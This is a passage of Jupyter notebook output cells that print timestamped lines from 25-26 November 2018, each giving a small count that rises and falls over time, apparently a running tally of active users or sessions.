"['2018-11-25 18:52:29.513069', 19]\n",
"['2018-11-25 18:53:35.723549', 18]\n",
"['2018-11-25 18:53:40.868142', 19]\n",
"['2018-11-25 18:54:25.424593', 20]\n",
"['2018-11-25 18:54:39.178278', 21]\n",
"['2018-11-25 18:54:52.707116', 22]\n",
"['2018-11-25 18:55:14.973751', 23]\n",
"['2018-11-25 18:55:27.193115', 24]\n",
"['2018-11-25 18:55:32.952091', 25]\n",
"['2018-11-25 18:55:33.538169', 26]\n",
"['2018-11-25 18:57:10.371173', 25]\n",
"['2018-11-25 18:57:32.275966', 24]\n",
"['2018-11-25 18:57:36.289115', 25]\n",
"['2018-11-25 18:57:45.405760', 24]\n",
"['2018-11-25 18:58:13.755722', 23]\n",
"['2018-11-25 18:58:25.858571', 20]\n",
"['2018-11-25 18:58:35.353441', 19]\n",
"['2018-11-25 18:58:40.991455', 17]\n",
"['2018-11-25 18:58:53.922213', 16]\n",
"['2018-11-25 18:59:08.183423', 15]\n",
"['2018-11-25 18:59:23.012476', 13]\n",
"['2018-11-25 18:59:43.027677', 10]\n",
"['2018-11-25 18:59:45.099133', 8]\n",
"['2018-11-25 19:00:03.834383', 9]\n",
"['2018-11-25 19:00:04.110870', 10]\n",
"['2018-11-25 19:00:11.111766', 11]\n",
"['2018-11-25 19:00:17.817205', 10]\n",
"['2018-11-25 19:00:32.962000', 11]\n",
"['2018-11-25 19:00:37.818061', 12]\n",
"['2018-11-25 19:00:49.210073', 13]\n",
"['2018-11-25 19:02:40.014564', 12]\n",
"['2018-11-25 19:03:15.871209', 11]\n",
"['2018-11-25 19:03:28.406737', 10]\n",
"['2018-11-25 19:03:35.866848', 11]\n",
"['2018-11-25 19:03:44.767643', 12]\n",
"['2018-11-25 19:04:33.288951', 10]\n",
"['2018-11-25 19:05:50.273123', 5]\n",
"['2018-11-25 19:07:40.167029', 4]\n",
"['2018-11-25 19:07:54.974184', 3]\n",
"['2018-11-25 19:20:15.437183', 2]\n",
"['2018-11-25 19:20:44.799466', 3]\n",
"['2018-11-25 19:21:57.127938', 4]\n",
"['2018-11-25 19:22:48.419606', 5]\n",
"['2018-11-25 19:23:03.964004', 6]\n",
"['2018-11-25 19:24:05.520880', 7]\n",
"['2018-11-25 19:28:05.550587', 4]\n",
"['2018-11-25 19:28:16.604773', 5]\n",
"['2018-11-25 19:28:53.539481', 6]\n",
"['2018-11-25 19:29:30.786441', 7]\n",
"['2018-11-25 19:29:35.217935', 8]\n",
"['2018-11-25 19:29:43.338888', 9]\n",
"['2018-11-25 19:29:51.750695', 8]\n",
"['2018-11-25 19:30:49.657802', 9]\n",
"['2018-11-25 19:30:49.973085', 10]\n",
"['2018-11-25 19:31:08.259691', 11]\n",
"['2018-11-25 19:31:09.813574', 12]\n",
"['2018-11-25 19:31:19.807650', 13]\n",
"['2018-11-25 19:31:27.066877', 14]\n",
"['2018-11-25 19:31:39.402500', 15]\n",
"['2018-11-25 19:31:45.862580', 16]\n",
"['2018-11-25 19:32:27.066714', 13]\n",
"['2018-11-25 19:32:43.204822', 14]\n",
"['2018-11-25 19:32:45.162653', 15]\n",
"['2018-11-25 19:32:50.730654', 16]\n",
"['2018-11-25 19:32:53.653110', 15]\n",
"['2018-11-25 19:33:01.838627', 16]\n",
"['2018-11-25 19:33:10.340087', 17]\n",
"['2018-11-25 19:33:10.567460', 18]\n",
"['2018-11-25 19:33:20.141810', 19]\n",
"['2018-11-25 19:33:31.872251', 18]\n",
"['2018-11-25 19:34:14.233229', 19]\n",
"['2018-11-25 19:34:28.783286', 18]\n",
"['2018-11-25 19:34:31.369289', 19]\n",
"['2018-11-25 19:34:50.734627', 18]\n",
"['2018-11-25 19:34:52.893288', 19]\n",
"['2018-11-25 19:34:53.745905', 20]\n",
"['2018-11-25 19:35:21.427981', 18]\n",
"['2018-11-25 19:36:10.566981', 17]\n",
"['2018-11-25 19:36:50.727247', 15]\n",
"['2018-11-25 19:37:07.267284', 16]\n",
"['2018-11-25 19:37:34.627637', 17]\n",
"['2018-11-25 19:37:40.112646', 18]\n",
"['2018-11-25 19:37:41.136206', 19]\n",
"['2018-11-25 19:38:13.830259', 20]\n",
"['2018-11-25 19:38:41.385592', 19]\n",
"['2018-11-25 19:39:04.484532', 20]\n",
"['2018-11-25 19:40:02.725413', 21]\n",
"['2018-11-25 19:40:12.061838', 22]\n",
"['2018-11-25 19:40:26.172777', 21]\n",
"['2018-11-25 19:41:02.112474', 20]\n",
"['2018-11-25 19:41:24.031967', 18]\n",
"['2018-11-25 19:42:13.388328', 19]\n",
"['2018-11-25 19:42:26.421724', 18]\n",
"['2018-11-25 19:42:26.811430', 19]\n",
"['2018-11-25 19:43:17.697137', 18]\n",
"['2018-11-25 19:43:35.939051', 19]\n",
"['2018-11-25 19:43:44.020133', 18]\n",
"['2018-11-25 19:44:05.972615', 15]\n",
"['2018-11-25 19:44:14.061751', 13]\n",
"['2018-11-25 19:44:28.441378', 10]\n",
"['2018-11-25 19:44:54.684237', 11]\n",
"['2018-11-25 19:45:31.845147', 12]\n",
"['2018-11-25 19:46:00.775837', 11]\n",
"['2018-11-25 19:46:34.291081', 9]\n",
"['2018-11-25 19:47:35.300868', 8]\n",
"['2018-11-25 19:47:41.798746', 9]\n",
"['2018-11-25 19:47:45.142991', 8]\n",
"['2018-11-25 19:49:39.392138', 5]\n",
"['2018-11-25 19:54:18.163915', 2]\n",
"['2018-11-25 20:05:59.464829', 3]\n",
"['2018-11-25 20:06:27.805908', 4]\n",
"['2018-11-25 20:07:31.752183', 5]\n",
"['2018-11-25 20:08:00.585028', 6]\n",
"['2018-11-25 20:10:58.647929', 4]\n",
"['2018-11-25 20:11:14.126636', 5]\n",
"['2018-11-25 20:12:54.833053', 4]\n",
"['2018-11-25 20:13:40.307515', 5]\n",
"['2018-11-25 20:13:53.077019', 6]\n",
"['2018-11-25 20:13:54.384444', 7]\n",
"['2018-11-25 20:14:10.577239', 8]\n",
"['2018-11-25 20:14:27.087117', 9]\n",
"['2018-11-25 20:19:59.363426', 2]\n",
"['2018-11-25 20:59:35.651231', 3]\n",
"['2018-11-25 21:19:03.578305', 2]\n",
"['2018-11-26 04:44:49.811693', 3]\n",
"['2018-11-26 04:53:00.680529', 2]\n",
"['2018-11-26 04:54:52.146736', 3]\n",
"['2018-11-26 04:54:53.047661', 4]\n",
"['2018-11-26 05:36:50.861981', 2]\n",
"['2018-11-26 05:41:34.925399', 3]\n",
"['2018-11-26 05:59:54.532503', 2]\n",
"['2018-11-26 06:06:57.408477', 3]\n",
"['2018-11-26 06:08:43.394911', 2]\n",
"['2018-11-26 06:09:20.931711', 3]\n",
"['2018-11-26 06:09:47.186591', 4]\n",
"['2018-11-26 06:10:14.936715', 5]\n",
"['2018-11-26 06:10:47.418155', 6]\n",
"['2018-11-26 06:10:47.542923', 7]\n",
"['2018-11-26 06:11:10.963642', 8]\n",
"['2018-11-26 06:12:50.868531', 9]\n",
"['2018-11-26 06:13:00.062255', 10]\n",
"['2018-11-26 06:13:21.430134', 9]\n",
"['2018-11-26 06:13:33.778452', 8]\n",
"['2018-11-26 06:13:47.531459', 7]\n",
"['2018-11-26 06:15:56.321556', 8]\n",
"['2018-11-26 06:16:04.015999', 9]\n",
"['2018-11-26 06:17:52.188229', 10]\n",
"['2018-11-26 06:18:24.718943', 11]\n",
"['2018-11-26 06:26:49.390015', 2]\n",
"['2018-11-26 06:29:44.254726', 3]\n",
"['2018-11-26 06:51:17.993165', 2]\n",
"['2018-11-26 06:54:18.080345', 3]\n",
"['2018-11-26 06:54:30.289237', 4]\n",
"['2018-11-26 06:55:06.614292', 5]\n",
"['2018-11-26 06:55:11.250843', 6]\n",
"['2018-11-26 06:57:01.182686', 7]\n",
"['2018-11-26 06:59:45.686869', 8]\n",
"['2018-11-26 07:00:07.196600', 9]\n",
"['2018-11-26 07:01:13.773360', 7]\n",
"['2018-11-26 07:01:34.711663', 5]\n",
"['2018-11-26 07:02:21.238763', 6]\n",
"['2018-11-26 07:02:29.468831', 7]\n",
"['2018-11-26 07:02:31.851140', 8]\n",
"['2018-11-26 07:02:36.061820', 9]\n",
"['2018-11-26 07:02:36.780881', 10]\n",
"['2018-11-26 07:02:38.957874', 11]\n",
"['2018-11-26 07:02:47.558037', 12]\n",
"['2018-11-26 07:02:48.499069', 13]\n",
"['2018-11-26 07:02:59.151448', 14]\n",
"['2018-11-26 07:03:40.118557', 15]\n",
"['2018-11-26 07:03:41.171957', 16]\n",
"['2018-11-26 07:03:46.465153', 15]\n",
"['2018-11-26 07:04:10.131544', 16]\n",
"['2018-11-26 07:04:31.303888', 17]\n",
"['2018-11-26 07:04:36.379986', 18]\n",
"['2018-11-26 07:04:37.800190', 17]\n",
"['2018-11-26 07:04:48.464503', 18]\n",
"['2018-11-26 07:04:58.965215', 19]\n",
"['2018-11-26 07:05:14.628199', 20]\n",
"['2018-11-26 07:05:18.825692', 21]\n",
"['2018-11-26 07:05:42.998322', 22]\n",
"['2018-11-26 07:05:46.538988', 23]\n",
"['2018-11-26 07:06:15.125134', 24]\n",
"['2018-11-26 07:06:27.917058', 23]\n",
"['2018-11-26 07:06:39.776614', 21]\n",
"['2018-11-26 07:06:50.887044', 20]\n",
"['2018-11-26 07:06:52.175641', 21]\n",
"['2018-11-26 07:07:03.019175', 22]\n",
"['2018-11-26 07:07:04.653429', 23]\n",
"['2018-11-26 07:07:25.704682', 22]\n",
"['2018-11-26 07:08:04.865751', 23]\n",
"['2018-11-26 07:08:10.712787', 22]\n",
"['2018-11-26 07:08:11.740108', 23]\n",
"['2018-11-26 07:08:17.591729', 24]\n",
"['2018-11-26 07:08:48.719215', 25]\n",
"['2018-11-26 07:08:59.223147', 24]\n",
"['2018-11-26 07:09:10.094731', 25]\n",
"['2018-11-26 07:09:20.141099', 24]\n",
"['2018-11-26 07:09:37.917785', 23]\n",
"['2018-11-26 07:10:01.349784', 22]\n",
"['2018-11-26 07:10:17.955398', 23]\n",
"['2018-11-26 07:10:45.854067', 24]\n",
"['2018-11-26 07:11:10.797081', 23]\n",
"['2018-11-26 07:11:11.651655', 24]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 07:11:50.445310', 23]\n",
"['2018-11-26 07:12:14.020880', 22]\n",
"['2018-11-26 07:12:29.968818', 21]\n",
"['2018-11-26 07:12:52.208936', 22]\n",
"['2018-11-26 07:13:00.798011', 21]\n",
"['2018-11-26 07:13:27.208946', 20]\n",
"['2018-11-26 07:13:47.134467', 21]\n",
"['2018-11-26 07:14:17.498440', 18]\n",
"['2018-11-26 07:14:34.825117', 19]\n",
"['2018-11-26 07:14:49.753577', 18]\n",
"['2018-11-26 07:15:20.835212', 17]\n",
"['2018-11-26 07:15:28.319343', 16]\n",
"['2018-11-26 07:15:55.437902', 14]\n",
"['2018-11-26 07:15:57.465699', 13]\n",
"['2018-11-26 07:16:15.576815', 14]\n",
"['2018-11-26 07:17:36.376028', 13]\n",
"['2018-11-26 07:17:51.956826', 14]\n",
"['2018-11-26 07:18:36.477847', 13]\n",
"['2018-11-26 07:19:23.037213', 11]\n",
"['2018-11-26 07:19:50.968974', 12]\n",
"['2018-11-26 07:20:26.537042', 11]\n",
"['2018-11-26 07:21:00.743900', 10]\n",
"['2018-11-26 07:21:04.352866', 11]\n",
"['2018-11-26 07:22:02.657832', 10]\n",
"['2018-11-26 07:23:10.827871', 8]\n",
"['2018-11-26 07:23:48.240422', 9]\n",
"['2018-11-26 07:24:10.828697', 7]\n",
"['2018-11-26 07:25:15.517166', 8]\n",
"['2018-11-26 07:25:26.108650', 9]\n",
"['2018-11-26 07:25:49.746001', 8]\n",
"['2018-11-26 07:26:23.921589', 7]\n",
"['2018-11-26 07:34:31.718480', 2]\n",
"['2018-11-26 07:35:01.707452', 3]\n",
"['2018-11-26 07:36:57.324208', 4]\n",
"['2018-11-26 07:37:05.543308', 5]\n",
"['2018-11-26 07:39:15.674994', 6]\n",
"['2018-11-26 07:41:09.816348', 7]\n",
"['2018-11-26 07:42:01.352067', 6]\n",
"['2018-11-26 07:45:00.774172', 7]\n",
"['2018-11-26 07:45:32.039026', 6]\n",
"['2018-11-26 07:46:34.868335', 7]\n",
"['2018-11-26 07:47:07.722463', 8]\n",
"['2018-11-26 07:48:55.875052', 9]\n",
"['2018-11-26 07:49:04.498012', 10]\n",
"['2018-11-26 07:50:45.288728', 11]\n",
"['2018-11-26 07:51:29.511390', 10]\n",
"['2018-11-26 07:51:47.403966', 11]\n",
"['2018-11-26 07:52:40.969308', 12]\n",
"['2018-11-26 07:53:05.920255', 11]\n",
"['2018-11-26 07:53:29.953075', 10]\n",
"['2018-11-26 07:53:38.569745', 11]\n",
"['2018-11-26 07:53:50.292667', 10]\n",
"['2018-11-26 07:55:39.777872', 11]\n",
"['2018-11-26 07:56:24.846926', 12]\n",
"['2018-11-26 07:56:38.463200', 13]\n",
"['2018-11-26 07:56:43.986854', 10]\n",
"['2018-11-26 07:56:57.566265', 11]\n",
"['2018-11-26 07:57:39.206600', 10]\n",
"['2018-11-26 07:57:42.220049', 11]\n",
"['2018-11-26 07:57:55.728725', 12]\n",
"['2018-11-26 07:58:06.840297', 13]\n",
"['2018-11-26 07:58:45.736102', 14]\n",
"['2018-11-26 07:59:24.533398', 15]\n",
"['2018-11-26 08:00:00.211268', 16]\n",
"['2018-11-26 08:00:01.236708', 17]\n",
"['2018-11-26 08:00:16.699897', 18]\n",
"['2018-11-26 08:02:00.708997', 17]\n",
"['2018-11-26 08:02:36.209999', 18]\n",
"['2018-11-26 08:02:52.698748', 19]\n",
"['2018-11-26 08:03:06.647548', 18]\n",
"['2018-11-26 08:03:35.167528', 17]\n",
"['2018-11-26 08:03:51.427099', 18]\n",
"['2018-11-26 08:03:58.764860', 19]\n",
"['2018-11-26 08:04:09.597979', 17]\n",
"['2018-11-26 08:04:23.939363', 15]\n",
"['2018-11-26 08:05:05.726429', 16]\n",
"['2018-11-26 08:05:11.916420', 15]\n",
"['2018-11-26 08:05:33.793051', 16]\n",
"['2018-11-26 08:05:43.282587', 17]\n",
"['2018-11-26 08:05:48.281595', 16]\n",
"['2018-11-26 08:06:26.192803', 17]\n",
"['2018-11-26 08:06:53.055779', 15]\n",
"['2018-11-26 08:07:57.290769', 11]\n",
"['2018-11-26 08:08:07.170315', 12]\n",
"['2018-11-26 08:08:31.196752', 11]\n",
"['2018-11-26 08:08:38.850439', 12]\n",
"['2018-11-26 08:08:43.082559', 13]\n",
"['2018-11-26 08:08:44.457609', 14]\n",
"['2018-11-26 08:09:13.872307', 15]\n",
"['2018-11-26 08:09:28.880132', 14]\n",
"['2018-11-26 08:09:38.901747', 13]\n",
"['2018-11-26 08:09:43.486682', 14]\n",
"['2018-11-26 08:09:56.734564', 15]\n",
"['2018-11-26 08:09:58.001035', 16]\n",
"['2018-11-26 08:10:11.604286', 17]\n",
"['2018-11-26 08:10:13.582102', 18]\n",
"['2018-11-26 08:10:19.766882', 17]\n",
"['2018-11-26 08:10:28.927074', 16]\n",
"['2018-11-26 08:10:54.249316', 17]\n",
"['2018-11-26 08:10:56.450886', 16]\n",
"['2018-11-26 08:10:57.380920', 17]\n",
"['2018-11-26 08:11:05.241480', 16]\n",
"['2018-11-26 08:11:29.945580', 17]\n",
"['2018-11-26 08:11:37.209514', 18]\n",
"['2018-11-26 08:12:20.229515', 19]\n",
"['2018-11-26 08:13:09.167485', 20]\n",
"['2018-11-26 08:13:21.176046', 19]\n",
"['2018-11-26 08:13:24.940785', 20]\n",
"['2018-11-26 08:13:28.585635', 21]\n",
"['2018-11-26 08:13:41.601194', 20]\n",
"['2018-11-26 08:13:57.861714', 19]\n",
"['2018-11-26 08:14:04.009664', 18]\n",
"['2018-11-26 08:14:09.285027', 19]\n",
"['2018-11-26 08:14:15.340654', 20]\n",
"['2018-11-26 08:14:30.487110', 19]\n",
"['2018-11-26 08:14:31.657982', 18]\n",
"['2018-11-26 08:14:38.469941', 19]\n",
"['2018-11-26 08:14:57.999796', 18]\n",
"['2018-11-26 08:15:03.102301', 17]\n",
"['2018-11-26 08:16:44.134977', 18]\n",
"['2018-11-26 08:16:47.641373', 17]\n",
"['2018-11-26 08:17:57.598378', 16]\n",
"['2018-11-26 08:18:15.605427', 15]\n",
"['2018-11-26 08:18:27.620939', 14]\n",
"['2018-11-26 08:18:39.657212', 13]\n",
"['2018-11-26 08:18:52.094898', 12]\n",
"['2018-11-26 08:19:10.451123', 13]\n",
"['2018-11-26 08:19:21.591617', 12]\n",
"['2018-11-26 08:19:51.765614', 13]\n",
"['2018-11-26 08:19:59.137548', 12]\n",
"['2018-11-26 08:20:12.483701', 11]\n",
"['2018-11-26 08:20:36.676120', 9]\n",
"['2018-11-26 08:22:09.001136', 10]\n",
"['2018-11-26 08:24:42.300182', 5]\n",
"['2018-11-26 08:26:42.377582', 2]\n",
"['2018-11-26 08:30:26.056521', 3]\n",
"['2018-11-26 08:33:06.283615', 4]\n",
"['2018-11-26 08:37:01.733436', 3]\n",
"['2018-11-26 08:37:46.750411', 2]\n",
"['2018-11-26 08:42:42.015757', 3]\n",
"['2018-11-26 08:42:43.366542', 4]\n",
"['2018-11-26 08:46:06.344004', 5]\n",
"['2018-11-26 08:47:06.349536', 3]\n",
"['2018-11-26 08:50:26.413510', 4]\n",
"['2018-11-26 08:51:08.218095', 5]\n",
"['2018-11-26 08:52:55.454808', 6]\n",
"['2018-11-26 08:53:10.222728', 7]\n",
"['2018-11-26 08:54:52.117500', 8]\n",
"['2018-11-26 08:55:07.422288', 7]\n",
"['2018-11-26 08:57:00.885998', 8]\n",
"['2018-11-26 08:57:37.481288', 7]\n",
"['2018-11-26 08:58:29.567248', 8]\n",
"['2018-11-26 08:58:52.791745', 9]\n",
"['2018-11-26 08:59:01.286668', 10]\n",
"['2018-11-26 08:59:09.255803', 11]\n",
"['2018-11-26 08:59:10.019036', 12]\n",
"['2018-11-26 08:59:28.756402', 13]\n",
"['2018-11-26 09:01:07.051643', 12]\n",
"['2018-11-26 09:01:17.668440', 13]\n",
"['2018-11-26 09:02:05.583763', 14]\n",
"['2018-11-26 09:03:17.877198', 13]\n",
"['2018-11-26 09:03:18.021878', 14]\n",
"['2018-11-26 09:03:58.200229', 13]\n",
"['2018-11-26 09:04:23.637475', 11]\n",
"['2018-11-26 09:04:56.576327', 12]\n",
"['2018-11-26 09:05:06.973928', 13]\n",
"['2018-11-26 09:05:50.854752', 14]\n",
"['2018-11-26 09:05:52.490034', 13]\n",
"['2018-11-26 09:06:41.269209', 14]\n",
"['2018-11-26 09:07:01.269221', 13]\n",
"['2018-11-26 09:07:15.461546', 12]\n",
"['2018-11-26 09:07:19.093497', 10]\n",
"['2018-11-26 09:07:44.305563', 11]\n",
"['2018-11-26 09:07:57.232923', 12]\n",
"['2018-11-26 09:09:02.796754', 13]\n",
"['2018-11-26 09:09:12.803902', 12]\n",
"['2018-11-26 09:09:24.749717', 13]\n",
"['2018-11-26 09:09:34.485683', 14]\n",
"['2018-11-26 09:09:52.422404', 15]\n",
"['2018-11-26 09:09:56.524790', 14]\n",
"['2018-11-26 09:09:56.760920', 15]\n",
"['2018-11-26 09:10:04.427208', 16]\n",
"['2018-11-26 09:10:07.123024', 17]\n",
"['2018-11-26 09:10:46.630083', 18]\n",
"['2018-11-26 09:11:01.013069', 19]\n",
"['2018-11-26 09:11:34.983987', 18]\n",
"['2018-11-26 09:11:56.758787', 17]\n",
"['2018-11-26 09:12:23.888909', 15]\n",
"['2018-11-26 09:12:25.694755', 16]\n",
"['2018-11-26 09:12:38.984294', 17]\n",
"['2018-11-26 09:12:39.828352', 18]\n",
"['2018-11-26 09:12:51.585213', 19]\n",
"['2018-11-26 09:12:53.901361', 20]\n",
"['2018-11-26 09:13:23.704021', 21]\n",
"['2018-11-26 09:13:25.944652', 22]\n",
"['2018-11-26 09:13:34.346759', 23]\n",
"['2018-11-26 09:13:52.942891', 22]\n",
"['2018-11-26 09:13:57.650310', 23]\n",
"['2018-11-26 09:14:09.091508', 22]\n",
"['2018-11-26 09:14:16.957519', 21]\n",
"['2018-11-26 09:14:23.177658', 22]\n",
"['2018-11-26 09:14:25.363135', 23]\n",
"['2018-11-26 09:14:34.405815', 24]\n",
"['2018-11-26 09:15:02.827374', 25]\n",
"['2018-11-26 09:15:07.075916', 24]\n",
"['2018-11-26 09:15:32.894915', 25]\n",
"['2018-11-26 09:16:36.270796', 26]\n",
"['2018-11-26 09:16:41.270761', 24]\n",
"['2018-11-26 09:16:55.911738', 23]\n",
"['2018-11-26 09:16:57.239258', 22]\n",
"['2018-11-26 09:17:21.619257', 23]\n",
"['2018-11-26 09:17:38.527136', 24]\n",
"['2018-11-26 09:17:39.951506', 25]\n",
"['2018-11-26 09:17:54.971123', 24]\n",
"['2018-11-26 09:18:25.330263', 23]\n",
"['2018-11-26 09:18:36.756762', 22]\n",
"['2018-11-26 09:18:43.452455', 23]\n",
"['2018-11-26 09:18:50.756029', 22]\n",
"['2018-11-26 09:18:52.613147', 23]\n",
"['2018-11-26 09:18:58.478704', 22]\n",
"['2018-11-26 09:19:04.889452', 20]\n",
"['2018-11-26 09:19:06.245340', 21]\n",
"['2018-11-26 09:19:10.650333', 20]\n",
"['2018-11-26 09:19:11.099577', 21]\n",
"['2018-11-26 09:19:35.753707', 19]\n",
"['2018-11-26 09:19:40.169801', 18]\n",
"['2018-11-26 09:20:28.540980', 17]\n",
"['2018-11-26 09:20:53.629212', 18]\n",
"['2018-11-26 09:21:12.420025', 17]\n",
"['2018-11-26 09:21:24.888893', 16]\n",
"['2018-11-26 09:21:31.025202', 17]\n",
"['2018-11-26 09:21:52.482003', 16]\n",
"['2018-11-26 09:21:56.284024', 17]\n",
"['2018-11-26 09:22:11.312650', 16]\n",
"['2018-11-26 09:22:59.535604', 14]\n",
"['2018-11-26 09:23:11.611520', 15]\n",
"['2018-11-26 09:23:51.191674', 14]\n",
"['2018-11-26 09:24:37.653814', 13]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 09:24:56.017597', 12]\n",
"['2018-11-26 09:25:55.854763', 10]\n",
"['2018-11-26 09:26:03.746484', 11]\n",
"['2018-11-26 09:26:18.030994', 10]\n",
"['2018-11-26 09:27:11.195634', 9]\n",
"['2018-11-26 09:27:26.140121', 7]\n",
"['2018-11-26 09:27:56.255568', 8]\n",
"['2018-11-26 09:28:11.179828', 7]\n",
"['2018-11-26 09:34:13.043992', 2]\n",
"['2018-11-26 09:36:27.515461', 3]\n",
"['2018-11-26 09:41:03.175602', 4]\n",
"['2018-11-26 09:41:07.593039', 3]\n",
"['2018-11-26 09:43:35.479960', 4]\n",
"['2018-11-26 09:45:49.952341', 5]\n",
"['2018-11-26 09:49:08.845046', 4]\n",
"['2018-11-26 09:49:53.167036', 3]\n",
"['2018-11-26 09:52:46.584337', 4]\n",
"['2018-11-26 09:56:34.744860', 5]\n",
"['2018-11-26 09:56:56.179781', 4]\n",
"['2018-11-26 09:56:57.964284', 5]\n",
"['2018-11-26 09:57:11.601980', 6]\n",
"['2018-11-26 09:57:35.252003', 5]\n",
"['2018-11-26 09:57:41.110206', 6]\n",
"['2018-11-26 09:57:45.931118', 7]\n",
"['2018-11-26 09:57:57.060627', 8]\n",
"['2018-11-26 09:58:01.337671', 9]\n",
"['2018-11-26 09:58:23.748114', 10]\n",
"['2018-11-26 09:59:10.214585', 11]\n",
"['2018-11-26 09:59:25.782318', 12]\n",
"['2018-11-26 10:00:52.567499', 13]\n",
"['2018-11-26 10:01:39.429098', 14]\n",
"['2018-11-26 10:01:41.900181', 13]\n",
"['2018-11-26 10:01:46.273106', 14]\n",
"['2018-11-26 10:02:02.122913', 12]\n",
"['2018-11-26 10:02:11.280980', 11]\n",
"['2018-11-26 10:02:34.963648', 10]\n",
"['2018-11-26 10:02:43.213468', 11]\n",
"['2018-11-26 10:03:10.268822', 12]\n",
"['2018-11-26 10:03:58.362187', 10]\n",
"['2018-11-26 10:04:11.999392', 11]\n",
"['2018-11-26 10:04:28.470517', 10]\n",
"['2018-11-26 10:04:39.598024', 11]\n",
"['2018-11-26 10:04:54.599703', 10]\n",
"['2018-11-26 10:05:26.134203', 11]\n",
"['2018-11-26 10:05:29.616037', 12]\n",
"['2018-11-26 10:05:29.990785', 13]\n",
"['2018-11-26 10:05:32.208917', 14]\n",
"['2018-11-26 10:05:37.811330', 15]\n",
"['2018-11-26 10:05:38.525458', 16]\n",
"['2018-11-26 10:05:46.196237', 14]\n",
"['2018-11-26 10:05:46.874278', 15]\n",
"['2018-11-26 10:05:56.225114', 16]\n",
"['2018-11-26 10:05:56.764080', 17]\n",
"['2018-11-26 10:06:04.434264', 18]\n",
"['2018-11-26 10:06:10.461457', 19]\n",
"['2018-11-26 10:06:25.211599', 20]\n",
"['2018-11-26 10:06:33.618855', 21]\n",
"['2018-11-26 10:06:47.605174', 19]\n",
"['2018-11-26 10:07:10.468462', 18]\n",
"['2018-11-26 10:07:10.971579', 19]\n",
"['2018-11-26 10:07:24.841566', 20]\n",
"['2018-11-26 10:08:06.966458', 21]\n",
"['2018-11-26 10:08:38.643320', 20]\n",
"['2018-11-26 10:09:20.760187', 21]\n",
"['2018-11-26 10:09:26.613188', 22]\n",
"['2018-11-26 10:09:30.799976', 21]\n",
"['2018-11-26 10:09:39.870117', 20]\n",
"['2018-11-26 10:10:03.933920', 19]\n",
"['2018-11-26 10:10:14.849284', 20]\n",
"['2018-11-26 10:11:17.653957', 21]\n",
"['2018-11-26 10:11:25.452292', 22]\n",
"['2018-11-26 10:11:47.151263', 23]\n",
"['2018-11-26 10:11:59.447156', 24]\n",
"['2018-11-26 10:12:09.669354', 25]\n",
"['2018-11-26 10:13:04.980667', 24]\n",
"['2018-11-26 10:13:45.766367', 23]\n",
"['2018-11-26 10:14:16.767393', 22]\n",
"['2018-11-26 10:14:46.069696', 23]\n",
"['2018-11-26 10:14:57.525069', 22]\n",
"['2018-11-26 10:15:05.943668', 21]\n",
"['2018-11-26 10:15:31.680343', 22]\n",
"['2018-11-26 10:15:48.125814', 21]\n",
"['2018-11-26 10:15:50.528874', 20]\n",
"['2018-11-26 10:15:52.269754', 19]\n",
"['2018-11-26 10:16:07.782626', 18]\n",
"['2018-11-26 10:16:18.633868', 16]\n",
"['2018-11-26 10:16:20.715676', 15]\n",
"['2018-11-26 10:16:28.870890', 14]\n",
"['2018-11-26 10:16:41.103711', 13]\n",
"['2018-11-26 10:16:47.292183', 12]\n",
"['2018-11-26 10:16:48.862422', 13]\n",
"['2018-11-26 10:17:04.816915', 14]\n",
"['2018-11-26 10:17:30.923207', 15]\n",
"['2018-11-26 10:17:32.882017', 16]\n",
"['2018-11-26 10:17:53.789935', 15]\n",
"['2018-11-26 10:18:00.254811', 16]\n",
"['2018-11-26 10:18:06.691409', 17]\n",
"['2018-11-26 10:18:44.519945', 18]\n",
"['2018-11-26 10:18:52.550373', 19]\n",
"['2018-11-26 10:19:41.461026', 20]\n",
"['2018-11-26 10:19:45.107583', 21]\n",
"['2018-11-26 10:20:10.304369', 22]\n",
"['2018-11-26 10:20:56.696360', 21]\n",
"['2018-11-26 10:21:30.176043', 22]\n",
"['2018-11-26 10:21:45.370731', 21]\n",
"['2018-11-26 10:21:55.565415', 20]\n",
"['2018-11-26 10:22:30.210637', 19]\n",
"['2018-11-26 10:22:37.720481', 20]\n",
"['2018-11-26 10:23:15.692926', 21]\n",
"['2018-11-26 10:23:16.816652', 22]\n",
"['2018-11-26 10:23:43.699532', 21]\n",
"['2018-11-26 10:24:00.331184', 20]\n",
"['2018-11-26 10:24:09.857789', 19]\n",
"['2018-11-26 10:24:10.327761', 18]\n",
"['2018-11-26 13:59:42.927132', 2]\n",
"['2018-11-26 13:59:44.663165', 3]\n",
"['2018-11-26 13:59:46.407447', 4]\n",
"['2018-11-26 13:59:47.309516', 5]\n",
"['2018-11-26 13:59:47.801068', 6]\n",
"['2018-11-26 13:59:54.876579', 7]\n",
"['2018-11-26 13:59:58.584335', 8]\n",
"['2018-11-26 14:00:04.248054', 9]\n",
"['2018-11-26 14:00:05.945847', 10]\n",
"['2018-11-26 14:00:06.584415', 11]\n",
"['2018-11-26 14:00:13.885002', 12]\n",
"['2018-11-26 14:00:21.266902', 13]\n",
"['2018-11-26 14:00:24.125573', 14]\n",
"['2018-11-26 14:00:35.075912', 15]\n",
"['2018-11-26 14:00:38.060425', 16]\n",
"['2018-11-26 14:00:41.994123', 17]\n",
"['2018-11-26 14:00:44.071474', 18]\n",
"['2018-11-26 14:00:54.335067', 19]\n",
"['2018-11-26 14:00:58.891057', 20]\n",
"['2018-11-26 14:01:01.922021', 21]\n",
"['2018-11-26 14:01:03.318096', 22]\n",
"['2018-11-26 14:01:04.353068', 23]\n",
"['2018-11-26 14:01:10.509776', 24]\n",
"['2018-11-26 14:01:19.344628', 25]\n",
"['2018-11-26 14:01:30.227866', 26]\n",
"['2018-11-26 14:01:36.338108', 27]\n",
"['2018-11-26 14:01:45.814211', 28]\n",
"['2018-11-26 14:01:47.925093', 29]\n",
"['2018-11-26 14:01:57.551248', 30]\n",
"['2018-11-26 14:02:04.325489', 31]\n",
"['2018-11-26 14:02:23.023428', 32]\n",
"['2018-11-26 14:02:37.749091', 33]\n",
"['2018-11-26 14:02:50.744633', 34]\n",
"['2018-11-26 14:03:01.188825', 35]\n",
"['2018-11-26 14:03:04.888274', 36]\n",
"['2018-11-26 14:03:47.823634', 35]\n",
"['2018-11-26 14:04:00.581639', 36]\n",
"['2018-11-26 14:04:14.223496', 37]\n",
"['2018-11-26 14:04:23.833665', 38]\n",
"['2018-11-26 14:04:24.711456', 39]\n",
"['2018-11-26 14:04:26.285695', 40]\n",
